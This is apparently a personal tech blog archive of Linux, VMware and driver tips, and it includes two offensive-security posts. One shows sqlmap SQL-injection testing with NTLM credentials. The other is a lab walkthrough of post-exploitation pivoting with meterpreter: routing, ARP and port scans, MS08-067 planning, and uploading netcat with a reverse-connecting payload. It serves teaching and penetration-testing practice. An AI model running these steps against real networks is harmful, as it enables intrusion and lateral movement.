.nessus reports merger AKA How to merge multiple Nessus reports (in .nessus file format)

I came across a situation when I had to merge several Nessus reports in a file, for the ease of vulnerability compilation and reporting. Turns out, it was just a google ('s/duckduckgo/google/g') search away.[0] :-)

Here-

1. Keep the python script[1] along with .nessus files in the same directory.
2. Run python script and a folder/file will be created nss_report/report.nessus.

Big thanks to mastahyeti for taking pain to create this wonderful script.

 ..............Done!!!

Reference(s) :
[0] http://cmikavac.net/2011/07/09/merging-multiple-nessus-scans-python-script/
[1] https://gist.github.com/mastahyeti/2720173

Force 'rm' to use Trash instead of removing files completely

This one's great.
Just realized that Linux system, by default, does not move data to Trash/Bin folders. It's the Desktop Environment that does so.
So when you 'rm -rf file', it does not send the files to Trash. If you have deleted some important files by mistake or you want to recover some files which had been accidentally removed using 'rm', you could be in trouble.

Here is what you can do to avoid such situations:
Replace 'rm' with a simple bash script which will move the deleted files to .Trash folder:

Note: Shamelessly copied as is from the forum link in the references below.

1. Backup original 'rm' command.

user@ubuntu:~$ sudo mv /usr/bin/rm /usr/bin/rm.bak

2. Edit /usr/bin/rm in your favorite editor and put this in:

#!/bin/bash mkdir ~/.Trash &> /dev/null while [ ! -z "$1" ]; do mv "$1" ~/.Trash/ shift done

..............Done!!!

Reference(s):
http://www.linuxforums.org/forum/newbie/69673-not-possible-recover-files-deleted-using-rm.html#post364949

VMware Player missing Virtual Network Manager

This should work with VMware Player 6.0.1.

VMware no longer provides Virtual Network Editor with VMware player from version 5.0 onwards.
And apart from only vmnetcfg.exe, one more file is needed, vmnetcfglib.dll for VMware Player 6.0.1.
Here we go:

1. Download VMware Workstation X (10 in my case at the time of writing). Do not install.
2. Extract files from command prompt from the downloaded location:
   C:\Users\user\Downloads\> VMware-workstation-full-10.0.1-1379776.exe /e vmware_extract\
   vmware_extract is the name of directory in which files will be extracted to.
3. Go to vmware_extract folder, and open core.cab using any extracting software (Winzip, Winrar, 7zip or even Windows default will open it if you double click on it).
4. Copy vmnetcfg.exe and _vmnetcfglib.dll to VMware Player's installation folder which is "C:\Program Files (x86)\VMware\VMware Player" in my case.
5. Rename _vmnetcfglib.dll to vmnetcfglib.dll (Remove beginning underscore '_' character).
6. Open vmnetcfg.exe. :-)

..............Done!!!


Reference(s):
https://communities.vmware.com/message/2305040
http://alexduan.com/2012/10/15/vmware-player-5-0-network-editor/

Unhide system tray icons on Ubuntu 12.04 Unity

I had couple of applications like Uget downloader, Truecrypt, Data card dialers for Reliance Netconnect, Tata Photon+, etc. which would run in background if you close (click on cross - X) them.

And at times, I needed to bring them to front for different reasons. By default, you do not see any system tray icons in Unity unlike on GNome, Mate or any of other desktop environments.

So here is how do you bring back system tray icons in Unity.

Run

user@ubuntu:~$ gsettings set com.canonical.Unity.Panel systray-whitelist "['all']" user@ubuntu:~$

..............Done!!!

PS: If changes doesn't show up immediately, run

user@ubuntu:~$ unity --replace

Reference : http://askubuntu.com/questions/67312/how-do-i-enable-the-pidgin-system-tray-icon


..............Done!!! 

Install Windows 7 and Ubuntu/Linux Mint on Dell vostro 3460 - having 32GB SSD drive

This was something for which I spent lot of time to make the newly shipped laptop dual boot with Win 7 and Linux Mint (Finally switched from Ubuntu to Linux mint, mainly because of Desktop Environment. I think of conducting a poll of "How many Ubuntu users switched their OS because of Desktop Environment?", or was there any already? Anyway I really got fade up of tweaking and twisting Precise Pangolin having Unity. So its a good feel with Mate on Linux Mint 13).


OK, back to the topic.
New Dell laptops have introduced a new technology called as Intel Rapid Storage Technology for improving protection, performance, etc.: http://www.intel.com/support/chipsets/imsm/sb/CS-020784.htm

They also used Intel Smart Response Technology, Intel Rapid Start Technology, and what not.


My Dell Vostro 3460 has WDC 1TB hard disk and 32GB Samsung SSD drive, with Intel i7 processor and 8GB DDR3 1600MHz RAM, etc.
The 32GB SSD to be used in conjunction with a high-capacity hard disk drive. The combination results in a high-performance, cost-effective storage solution. But only in case of Windows 8. I was quarreling with Dell support guys, what is the point of shipping it with the laptops which can not utilize it. And they say, "Sir, you can upgrade to Windows 8 so to utilize it."

Anyway, here is what I did:

You might not find any drive to install when SATA operation in BIOS is set to Intel RST.

So you would need to go to BIOS and change SATA operation to AHCI.

Then you will see the drives to reformat and install OS.

Disk 0 partitions belong to 32GB SSD drive whereas Disk 1 partitions are present with 1TB WDC hard disk.

There is no possible way to install "System Reserved" - 100MB (Needed for Win 7) in 32GB SSD drive. I tried multiple times to achieve that with no luck. :-(

Also, 32GB space is not enough for C: to install Win 7 onto (with all driver and other installations, etc.). Although its possible. I was installing all rest of the softwares on D: which I had created on 1TB hard disk, but again exception being Graphics driver for Nvidia. As you can not customize the path while installing it.

Finally, after so many alternatives, I thought of installing Linux first, so that I can utilize 32GB SSD drive for '/' partition, as 32GB will be more than enough for '/' partition unlike C: in case of Windows. And installing rest all partitions on 1TB hard disk.

• Install / partition on 32GB SSD drive
• 200MB /boot partition on 1TB
• 200GB C: partition on 1TB
• Rest all /home partition on 1TB

I didn't think of Swap as I thought I won't be in need because of 8GB RAM.

Once Linux Mint was installed, you would need to install Windows and of course, laptop couldn't recognize any other OS other than Windows because of overwriting of grub, so follow : https://help.ubuntu.com/community/RecoveringUbuntuAfterInstallingWindows

Once the Grub repair is done, you can see dual boot screen with Linux Mint and Windows 7. :-)

..............Done!!!

[Linux-Mint 13 - Maya] Disable Nvidia discrete graphic card in a Nvidia optimus laptop

I had been really really screwed up as I was not able to optimize my laptop battery life.
I'm having Windows 7 - Pro and Linux Mint 13 - Maya in dual boot. Yes, I switched to Linux Mint after lot of head-banging with Ubuntu 12.04 with freaky Unity. So this is it. With Linux Mint 13 Mate variant now.

Alright. Now, I had hell lot of problems lined up with DELL Vostro 3460 to customize it my own way.

Battery was lasting for nearly 5 hours with Windows 7 Pro, but that wasn't same with Mint. I had to struggle a lot to find out ways how can I optimize my laptop battery. Mint would last for merely 2 hours. That was really annoying. So many optimization options were not really helping me. Like installing laptop-mode-tools, disabling unused services for every boot-time, and what not.
And even after all that, powertop showed power consumption to be ~ 25 Watts.
Moreover, without ANY application open after just logging into the system. :-(

I was so annoyed that, after thinking of changing distro to ArchLinux, Debian, Fedora, CentOS, I even thought to format laptop and stick to Windows 7 - pro. :-(
I had anyway paid for Windows 7, so why not just focus on it.

Anyway let the rest of story rest in peace. :-)

After lot of head-banging, I figured out that its Nvidia drivers who is culprit behind all this. I saw people saying, "if you had to install Linux on laptop, why go for optimus Laptops."

But this blog post saved me hell lot of battery life:
https://wenlong.wordpress.com/2012/05/01/disable-the-nvidia-discrete-graphic-card-in-a-nvidia-optimus-laptop/

Thank you so much man.
Now, powertop shows merely 10 Watts after logging into system. :-)

I thought of creating a Bash script for lazy bunnies, but then it has a github download link for which version might differ as well. So, that is it!

What do I say to Nvidia when Linus can say that better. :D



..............Done!!!

Install Intel Ethernet drivers on Ubuntu 10.04

This is one thing which I kept on doing every time I do sudo apt-get update; apt-get upgrade on my Ubuntu desktop. Thought someone could be stuck with similar issue.

Ok. If you are getting errors while installing Intel Ethernet drivers on Ubuntu as follows:

user@ubuntu:~/e1000e-x.xx.x/src$ sudo make install Makefile:71: *** Kernel header files not in any of the expected locations. Makefile:72: *** Install the appropriate kernel development package, e.g. Makefile:73: *** kernel-devel, for building kernel modules and try again. Stop.

then you need to follow following steps:

1. Install kernel headers for your kernel version:

user@ubuntu:~/e1000e-x.xx.x/src$ sudo apt-get install linux-headers-$(uname -r) Reading package lists... Done Building dependency tree Reading state information... Done The following extra packages will be installed: linux-headers-2.6.32-45 The following NEW packages will be installed: linux-headers-2.6.32-45 linux-headers-2.6.32-45-generic 0 upgraded, 2 newly installed, 0 to remove and 1 not upgraded. Need to get 11.0MB of archives. After this operation, 85.3MB of additional disk space will be used. Do you want to continue [Y/n]? y Err http://in.archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-2.6.32-45 2.6.32-45.99 Could not connect to in.archive.ubuntu.com:80 (91.189.92.202). - connect (110: Connection timed out) Err http://in.archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-2.6.32-45-generic 2.6.32-45.99 Could not connect to in.archive.ubuntu.com:80 (91.189.92.202). - connect (110: Connection timed out) Failed to fetch http://in.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-45_2.6.32-45.99_all.deb Could not connect to in.archive.ubuntu.com:80 (91.189.92.202). - connect (110: Connection timed out) Failed to fetch http://in.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-45-generic_2.6.32-45.99_amd64.deb Could not connect to in.archive.ubuntu.com:80 (91.189.92.202). - connect (110: Connection timed out) E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?

Of course, as you do not have Internet connection, it can not download / fetch the required packages from the server. But by executing this command, you get to know what packages has to be downloaded from the Ubuntu servers.
In my case, those are: linux-headers-2.6.32-45 & linux-headers-2.6.32-45-generic.

2. So, lets download those packages from the URL's:
http://in.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-45_2.6.32-45.99_all.deb
http://in.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-45-generic_2.6.32-45.99_amd64.deb

3. Once downloaded (from some box having active Internet connection), we will try to install it on our machine:

user@ubuntu:~/e1000e-x.xx.x/src$ sudo dpkg -i linux-headers-2.6.32-45* Selecting previously deselected package linux-headers-2.6.32-45. (Reading database ... 165649 files and directories currently installed.) Unpacking linux-headers-2.6.32-45 (from .../linux-headers-2.6.32-45_2.6.32-45.99_all.deb) ... Selecting previously deselected package linux-headers-2.6.32-45-generic. Unpacking linux-headers-2.6.32-45-generic (from .../linux-headers-2.6.32-45-generic_2.6.32-45.99_amd64.deb) ... Setting up linux-headers-2.6.32-45 (2.6.32-45.99) ... Setting up linux-headers-2.6.32-45-generic (2.6.32-45.99) ... Examining /etc/kernel/header_postinst.d. run-parts: executing /etc/kernel/header_postinst.d/dkms 2.6.32-45-generic /boot/vmlinuz-2.6.32-45-generic run-parts: executing /etc/kernel/header_postinst.d/nvidia-common 2.6.32-45-generic /boot/vmlinuz-2.6.32-45-generic user@ubuntu:~/e1000e-x.xx.x/src$

4. Now, we will try to 'make install':

user@ubuntu:~/e1000e-x.xx.x/src$ sudo make install make -C /lib/modules/2.6.32-45-generic/build SUBDIRS=/home/user/e1000e-x.xx.x/src modules make[1]: Entering directory `/usr/src/linux-headers-2.6.32-45-generic' CC [M] /home/user/e1000e-x.xx.x/src/netdev.o CC [M] /home/user/e1000e-x.xx.x/src/ethtool.o CC [M] /home/user/e1000e-x.xx.x/src/param.o CC [M] /home/user/e1000e-x.xx.x/src/82571.o CC [M] /home/user/e1000e-x.xx.x/src/ich8lan.o CC [M] /home/user/e1000e-x.xx.x/src/80003es2lan.o CC [M] /home/user/e1000e-x.xx.x/src/mac.o CC [M] /home/user/e1000e-x.xx.x/src/nvm.o CC [M] /home/user/e1000e-x.xx.x/src/phy.o CC [M] /home/user/e1000e-x.xx.x/src/manage.o CC [M] /home/user/e1000e-x.xx.x/src/kcompat.o LD [M] /home/user/e1000e-x.xx.x/src/e1000e.o Building modules, stage 2. MODPOST 1 modules CC /home/user/e1000e-x.xx.x/src/e1000e.mod.o LD [M] /home/user/e1000e-x.xx.x/src/e1000e.ko make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-45-generic' # remove all old versions of the driver find /lib/modules/2.6.32-45-generic -name e1000e.ko -exec rm -f {} \; || true find /lib/modules/2.6.32-45-generic -name e1000e.ko.gz -exec rm -f {} \; || true install -D -m 644 e1000e.ko /lib/modules/2.6.32-45-generic/kernel/drivers/net/ethernet/intel/e1000e/e1000e.ko /sbin/depmod -a || true install -D -m 644 e1000e.7.gz /usr/share/man/man7/e1000e.7.gz man -c -P'cat > /dev/null' e1000e || true e1000e.

This looks good.

5. Although after all this, sudo modprobe e1000e didn't work and I didn't get the Ethernet connection back. :-(
You will have to make sure that older e1000e drivers are removed from the kernel, before loading the new module.

user@ubuntu:~/e1000e-x.xx.x/src$ sudo rmmod e1000e user@ubuntu:~/e1000e-x.xx.x/src$ sudo modprobe e1000e user@ubuntu:~/e1000e-x.xx.x/src$

..............Done!!!

sqlmap - NTLM authentication

It's been while I've posted anything new.
Had to stumble upon for an issue, while I was searching for NTLM authentication with 'sqlmap'.
Well if you are using sqlmap from BackTrack, this post is not for you. :-)

But, if you are trying your hands-on with sqlmap on your favorite Linux distro(Ubuntu, in my case), then this post will help you use sqlmap against NTLM authentication-based websites.

So here we go:

1.Tried running sqlmap with --auth-type and --auth-cred switches:

user@ubuntu:~$ ./sqlmap.py --auth-type=NTLM --auth-cred="DOMAIN\username:password" -u "http://www.domain.com/home.php?vulnid=1" -p "vulnid" sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 12:22:48 [12:22:48] [CRITICAL] sqlmap requires Python NTLM third-party library in order to authenticate via NTLM, http://code.google.com/p/python-ntlm/ [*] shutting down at: 12:22:48

2. Failed. Ok. Downloaded python-ntlm library and try to install:

user@ubuntu:~$ sudo python setup.py install Traceback (most recent call last): File "setup.py", line 1, in from setuptools import setup, find_packages ImportError: No module named setuptools

3. Failed again. Will try to install setuptools. Download setuptools from here:

user@ubuntu:~$ sudo sh setuptools-0.6c11-py2.7.egg [sudo] password for user: Processing setuptools-0.6c11-py2.7.egg Copying setuptools-0.6c11-py2.7.egg to /usr/local/lib/python2.7/dist-packages Adding setuptools 0.6c11 to easy-install.pth file Installing easy_install script to /usr/local/bin Installing easy_install-2.7 script to /usr/local/bin Installed /usr/local/lib/python2.7/dist-packages/setuptools-0.6c11-py2.7.egg Processing dependencies for setuptools==0.6c11 Finished processing dependencies for setuptools==0.6c11

4. After successfully installing setuptools, try again installing python-ntlm library:

user@ubuntu:~$ user@ubuntu:~$ sudo python setup.py install running install Checking .pth file support in /usr/local/lib/python2.7/dist-packages/ /usr/bin/python -E -c pass TEST PASSED: /usr/local/lib/python2.7/dist-packages/ appears to support .pth files running bdist_egg running egg_info creating python_ntlm.egg-info writing python_ntlm.egg-info/PKG-INFO writing top-level names to python_ntlm.egg-info/top_level.txt writing dependency_links to python_ntlm.egg-info/dependency_links.txt writing entry points to python_ntlm.egg-info/entry_points.txt writing manifest file 'python_ntlm.egg-info/SOURCES.txt' writing manifest file 'python_ntlm.egg-info/SOURCES.txt' installing library code to build/bdist.linux-x86_64/egg running install_lib running build_py creating build creating build/lib.linux-x86_64-2.7 creating build/lib.linux-x86_64-2.7/ntlm copying ntlm/des_data.py -> build/lib.linux-x86_64-2.7/ntlm copying ntlm/des_c.py -> build/lib.linux-x86_64-2.7/ntlm copying ntlm/U32.py -> build/lib.linux-x86_64-2.7/ntlm copying ntlm/ntlm.py -> build/lib.linux-x86_64-2.7/ntlm copying ntlm/__init__.py -> build/lib.linux-x86_64-2.7/ntlm copying ntlm/des.py -> build/lib.linux-x86_64-2.7/ntlm copying ntlm/HTTPNtlmAuthHandler.py -> build/lib.linux-x86_64-2.7/ntlm creating build/bdist.linux-x86_64 creating build/bdist.linux-x86_64/egg creating build/bdist.linux-x86_64/egg/ntlm copying build/lib.linux-x86_64-2.7/ntlm/des_data.py -> build/bdist.linux-x86_64/egg/ntlm copying build/lib.linux-x86_64-2.7/ntlm/des_c.py -> build/bdist.linux-x86_64/egg/ntlm copying build/lib.linux-x86_64-2.7/ntlm/U32.py -> build/bdist.linux-x86_64/egg/ntlm copying build/lib.linux-x86_64-2.7/ntlm/ntlm.py -> build/bdist.linux-x86_64/egg/ntlm copying build/lib.linux-x86_64-2.7/ntlm/__init__.py -> build/bdist.linux-x86_64/egg/ntlm copying build/lib.linux-x86_64-2.7/ntlm/des.py -> build/bdist.linux-x86_64/egg/ntlm copying build/lib.linux-x86_64-2.7/ntlm/HTTPNtlmAuthHandler.py -> build/bdist.linux-x86_64/egg/ntlm byte-compiling build/bdist.linux-x86_64/egg/ntlm/des_data.py to des_data.pyc byte-compiling build/bdist.linux-x86_64/egg/ntlm/des_c.py to des_c.pyc byte-compiling build/bdist.linux-x86_64/egg/ntlm/U32.py to U32.pyc byte-compiling build/bdist.linux-x86_64/egg/ntlm/ntlm.py to ntlm.pyc byte-compiling build/bdist.linux-x86_64/egg/ntlm/__init__.py to __init__.pyc byte-compiling build/bdist.linux-x86_64/egg/ntlm/des.py to des.pyc byte-compiling build/bdist.linux-x86_64/egg/ntlm/HTTPNtlmAuthHandler.py to HTTPNtlmAuthHandler.pyc creating build/bdist.linux-x86_64/egg/EGG-INFO copying python_ntlm.egg-info/PKG-INFO -> build/bdist.linux-x86_64/egg/EGG-INFO copying python_ntlm.egg-info/SOURCES.txt -> build/bdist.linux-x86_64/egg/EGG-INFO copying python_ntlm.egg-info/dependency_links.txt -> build/bdist.linux-x86_64/egg/EGG-INFO copying python_ntlm.egg-info/entry_points.txt -> build/bdist.linux-x86_64/egg/EGG-INFO copying python_ntlm.egg-info/not-zip-safe -> build/bdist.linux-x86_64/egg/EGG-INFO copying python_ntlm.egg-info/top_level.txt -> build/bdist.linux-x86_64/egg/EGG-INFO creating dist creating 'dist/python_ntlm-1.0.1-py2.7.egg' and adding 'build/bdist.linux-x86_64/egg' to it removing 'build/bdist.linux-x86_64/egg' (and everything under it) Processing python_ntlm-1.0.1-py2.7.egg creating /usr/local/lib/python2.7/dist-packages/python_ntlm-1.0.1-py2.7.egg Extracting python_ntlm-1.0.1-py2.7.egg to /usr/local/lib/python2.7/dist-packages Adding python-ntlm 1.0.1 to easy-install.pth file Installing ntlm_example_extended script to /usr/local/bin Installing ntlm_example_simple script to /usr/local/bin Installed /usr/local/lib/python2.7/dist-packages/python_ntlm-1.0.1-py2.7.egg Processing dependencies for python-ntlm==1.0.1 Finished processing dependencies for python-ntlm==1.0.1

5. So, python-ntlm library has been installed successfully. Now we try again running sqlmap with --auth-type and --auth-cred switches:

user@ubuntu:~$ ./sqlmap.py --auth-type=NTLM --auth-cred="DOMAIN\username:password" -u "http://www.domain.com/home.php?vulnid=1" -p "vulnid" sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 12:35:38 [12:35:39] [INFO] using '/home/user/sqlmap/output/domain.com/session' as session file [12:35:47] [INFO] testing connection to the target url [12:36:11] [INFO] testing if the url is stable, wait a few seconds [12:36:12] [INFO] url is stable [12:36:12] [INFO] testing sql injection on GET parameter 'vulnid' [12:36:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [12:36:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [12:36:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [12:36:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' [12:36:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [12:36:15] [INFO] testing 'MySQL > 5.0.11 stacked queries' [12:36:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [12:36:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [12:36:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [12:36:17] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [12:36:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [12:36:17] [INFO] testing 'Oracle AND time-based blind' [12:36:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [12:36:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [12:36:22] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS . . . . </..snip..>;

..............Done!!!

How to find file creation date in Linux

I had been struggling a lot, A LOT(I mean it) to find *any* possible solution to get the file creation date on Linux systems. But, I had given up at one point.
All in all, suddenly I came across a post on garage4hackers, and was so happy to see it.
So here we go...

Also AFAIK, this is possible with ext4 filesystems:

user@ubuntu:~$ touch test.txt && ls -l test.txt -rw-r--r-- 1 user user 0 2011-09-27 18:38 test.txt user@ubuntu:~$ cat << __eof > test.txt Hi there, Hope you all fine. __eof user@ubuntu:~$ ls -l test.txt -rw-r--r-- 1 user user 29 2011-09-27 19:44 test.txt user@ubuntu:~$ ls -i test.txt 14552801 test.txt user@ubuntu:~$ sudo debugfs -R 'stat <14552801>' /dev/sda7 [sudo] password for user: Inode: 14552801 Type: regular Mode: 0644 Flags: 0x80000 Generation: 340511001 Version: 0x00000000:00000001 User: 1000 Group: 1000 Size: 29 File ACL: 0 Directory ACL: 0 Links: 1 Blockcount: 8 Fragment: Address: 0 Number: 0 Size: 0 ctime: 0x4e81da5b:513cbff4 -- Tue Sep 27 19:44:51 2011 atime: 0x4e81da5e:c8725434 -- Tue Sep 27 19:44:54 2011 mtime: 0x4e81da5b:513cbff4 -- Tue Sep 27 19:44:51 2011 crtime: 0x4e81cacc:966104fc -- Tue Sep 27 18:38:28 2011 Size of extra inode fields: 28 EXTENTS: (0): 58665199 debugfs 1.41.11 (14-Mar-2010)

Please note various timestamps mentioned in output

atime: Last time file was opened or executed
ctime: Time the inode information was updated. ctime also gets updated when file is modified
mtime: Last modified time
And most importantly
crtime: File creation time


Thanks to Hackuin, who had posted about it on garage4hackers forum.
Reference: http://www.garage4hackers.com/f30/did-you-know-330-2.html


..............Done!!!

Clone virtual machine in VirtualBox....

If you have used VmWare Workstation earlier and now working on VirtulBox, you may have to bang your head to create a cloned virtual machine on VirtualBox. As it's not as easy as you do in VMWare workstation.(#FAIL @VirtulBox).

Never mind...here are the steps you can do on your Ubuntu host OS to create clone of a guest OS.

$ vboxmanage clonehd <source-folder/file.vdi> <destination-folder/clone.vdi> 0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100% Clone hard disk created in format 'VDI'. UUID: e64c4d5f-8ae1-4e69-aa68-cedd3fe5c43e $

Next, create a New virtual machine.
And while choosing virtual hard disk, just choose the option "Use existing hard disk", instead of creating a new one.
And just give the path of 'vdi' file, you've just created.

..............Done!!!

Ubunt 11.04 is here...

Woohoo...Ubuntu 11.04, codenamed 'Natty Narwhal' has been just released.
Get you copy...

Here are some torrent files, you might be interested :)
-Desktop editions:
    -64 bit : http://releases.ubuntu.com/11.04/ubuntu-11.04-desktop-amd64.iso.torrent
    -32 bit : http://releases.ubuntu.com/11.04/ubuntu-11.04-desktop-i386.iso.torrent

-Server editions:
    -64 bit : http://releases.ubuntu.com/11.04/ubuntu-11.04-server-amd64.iso.torrent
    -32 bit : http://releases.ubuntu.com/11.04/ubuntu-11.04-server-i386.iso.torrent

Enjoy :-)

Advanced Nmap usage...

Got a nice post about advanced nmap and other tools from nmap team...
Check this out...
http://www.securityaegis.com/advanced-nmap/?utm_source=twitterfeed&utm_medium=twitter&utm_campaign=Feed%3A+securityaegis%2FigXu+%28Security+Aegis%29

..............Done!!!

Small tips and tricks

Thought to share few tips and tricks...

1.Ubuntu fresh installation
While making a fresh installation of ubuntu, it's always safer to give separate partitions for boot, root(/), swap(if needed) and home directory. So, while installation, select "Manual partitioning" and delete all the current partitions(ALWAYS REMEMBER TO TAKE BACKUP BEFORE PROCEEDING FOR FRESH INSTALLATION). And specify partitions as follows:(I will take my system configurations as an example, so that may give you an idea)

- /boot   : Primary partition, 100MB space
- /          : Primary partition, 20GB space (min recommended is 8GB)
- /home : Primary partition, rest-complete space

I didn't find any need to give anything for swap partition. As I have 4GB RAM and applications I would be running includes VMWare workstation/VirtualBox, Ubuntu Compiz effects, Firefox, Google Chrome, etc.

So, I didn't find to waste any space for swap, if I won't be needing it. You may decide swap according to your needs.
Here is a link, which can be helpful for taking backup and reinstalling/upgrading ubuntu:
https://help.ubuntu.com/community/Partitioning/Home/Moving


2. Execute command from history
Many times, things may happen like, you want to execute a very long command and you are as lazy as I am. So, here is what you do:

ubuntu@localhost:~$ history |grep rsync 110 man rsync 111 rsync -h 116 rsync -h |grep time 117 rsync -h |grep -i time 122 rsync -arH some/local/dir some-machine-name:/some/remote/dir . . . . . . . ubuntu@localhost:~$ !122 rsync -arH some/local/dir some-machine-name:/some/remote/dir ubuntu@localhost:~$

3. rsync : Sync and Backup utility in Ubuntu



..............Done(for now)!!!

[Ubuntu] perl: warning: Setting locale failed.

Hi,

I have faced this problem many more times on either client desktops or when I have to configure some ubuntu server. So I had to search for the solution every time I face this annoying thing again and again.
Just thought of writing about it, and so people(like me, who merely remember what they did to sort out the problem) won't face it again and again.

perl: warning: Setting locale failed. perl: warning: Please check that your locale settings: LANGUAGE = (unset), LC_ALL = (unset), LANG = "en_US.utf8" are supported and installed on your system. perl: warning: Falling back to the standard locale ("C").

So, here is what I did to solve it

ubuntu@localhost:~$ sudo locale-gen en_US.UTF-8 [sudo] password for ubuntu: Generating locales... en_US.UTF-8... done Generation complete. ubuntu@localhost:~$ sudo dpkg-reconfigure locales Generating locales... en_US.UTF-8... up-to-date Generation complete. ubuntu@localhost:~$

..............Done!!!

[n|u Delhi Presentations] Post exploitation techniques...

There was a presentation on "Post exploitation techniques using msf-nc kungfu" in null monthly meet.
So here is post about the presentation and things I may have missed.

Aim:
There is a compromised machine in a network and you want to find/target other nodes inside the network.

Scenario:
Attacker running BackTrack sitting outside the network. Machine A (Pivot) and machine B behind the NAT.



So here we go with the meterpreter session on pivot machine:

meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport Hardware MAC: 00:0c:29:1e:d3:76 IP Address : 192.168.74.128 Netmask : 255.255.255.0 meterpreter > route Network routes ============== Subnet Netmask Gateway ------ ------- ------- 0.0.0.0 0.0.0.0 192.168.74.2 127.0.0.0 255.0.0.0 127.0.0.1 192.168.74.0 255.255.255.0 192.168.74.128 192.168.74.128 255.255.255.255 127.0.0.1 192.168.74.255 255.255.255.255 192.168.74.128 224.0.0.0 240.0.0.0 192.168.74.128 255.255.255.255 255.255.255.255 192.168.74.128 meterpreter >

1. Pass the traffic for desired subnet through meterpreter session:
So, in order to run scans and use other modules of meterpreter, we would need to add route so that when we target a particular subnet it will be routed through meterpreter session.
Let's see, how we can do that...

Back on the multi/handler...

msf exploit(handler) > route add 192.168.74.0 255.255.255.0 1 msf exploit(handler) > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 192.168.74.0 255.255.255.0 Session 1 msf exploit(handler) >

So now the network traffic meant for subnet 192.168.74.0/24 would be routed through meterpreter session 1.

2. Enumerate the nodes inside the network:
We will be using meterpreter module arp_scanner to scan the network.

msf exploit(handler) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > run arp_scanner -h Meterpreter Script for performing an ARPS Scan Discovery. OPTIONS: -h Help menu. -i Enumerate Local Interfaces -r The target address range or CIDR identifier -s Save found IP Addresses to logs. meterpreter > run arp_scanner -r 192.168.74.0/24 [*] ARP Scanning 192.168.74.0/24 [*] IP: 192.168.74.1 MAC 0:50:56:c0:0:8 [*] IP: 192.168.74.2 MAC 0:50:56:ec:f0:e5 [*] IP: 192.168.74.128 MAC 0:c:29:1e:d3:76 [*] IP: 192.168.74.129 MAC 0:c:29:7e:bd:74 [*] IP: 192.168.74.254 MAC 0:50:56:e5:a:b0 meterpreter >

Ok. As you can see, there are 5 IP addresses seems alive in the network.
The IP address 192.168.74.1, 192.168.74.2 and 192.168.74.254 are of VMware workstation virtual network adapters.
The distribution is like
192.168.74.2 - gateway IP address of virtual machine behind NAT
192.168.74.1 - external IP address(vmnet8)
192.168.74.254 - DHCP server for virtual machines behind NAT

So, apart from all that, there is one more virtual machine which can be of our interest.
Let's find out...

We will use tcp portscanner auxiliary module to find out the open ports...(with some well-known ports)

msf exploit(handler) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host FILTER no The filter string for capturing traffic INTERFACE no The name of the interface PCAPFILE no The name of the PCAP capture file to process PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target address range or CIDR identifier SNAPLEN 65535 yes The number of bytes to capture THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds VERBOSE false no Display verbose output msf auxiliary(tcp) > set RHOSTS 192.168.74.129 RHOSTS => 192.168.74.129 msf auxiliary(tcp) > set PORTS 21,22,23,25,80,110,135,139,443,445 PORTS => 21,22,23,25,80,110,135,139,443,445 msf auxiliary(tcp) > run [*] 192.168.74.129:139 - TCP OPEN [*] 192.168.74.129:445 - TCP OPEN [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(tcp) >

Alright. So there seems to be sharing enabled on the target machine.
We will use infamous ms08_067 exploit...

But, now there are problems choosing appropriate payload.
- Bindshell payload can't be used, as we have no direct access to machine B. So even if machine B gets infected and starts listening on some port specified by the payload, we won't be able to connect to it.
- Reverse connect payloads also can't be used, assuming the situation that machine B has no direct internet access.

So, all I did was uploaded netcat and a custom file which is combination of a HTTP-response appended with meterpreter client executable(in this case if successful, of course, it would reverse connect back to the listening multi/handler on attacker's machine and so to confirm that the exploit was successful).

Let's do that...

meterpreter > upload /tmp/netcat.exe /tmp/httpresponse-msf.cfg %temp% [*] uploading : /tmp/netcat.exe -> %temp% [*] uploaded : /tmp/netcat.exe -> %temp%\netcat.exe [*] uploading : /tmp/httpresponse-msf.cfg -> %temp% [*] uploaded : /tmp/httpresponse-msf.cfg -> %temp%\httpresponse-msf.cfg meterpreter >

Ok.
So now we will start a small webserver using netcat on pivot machine with redirecting httpresponse-msf.cfg(can have any extension).

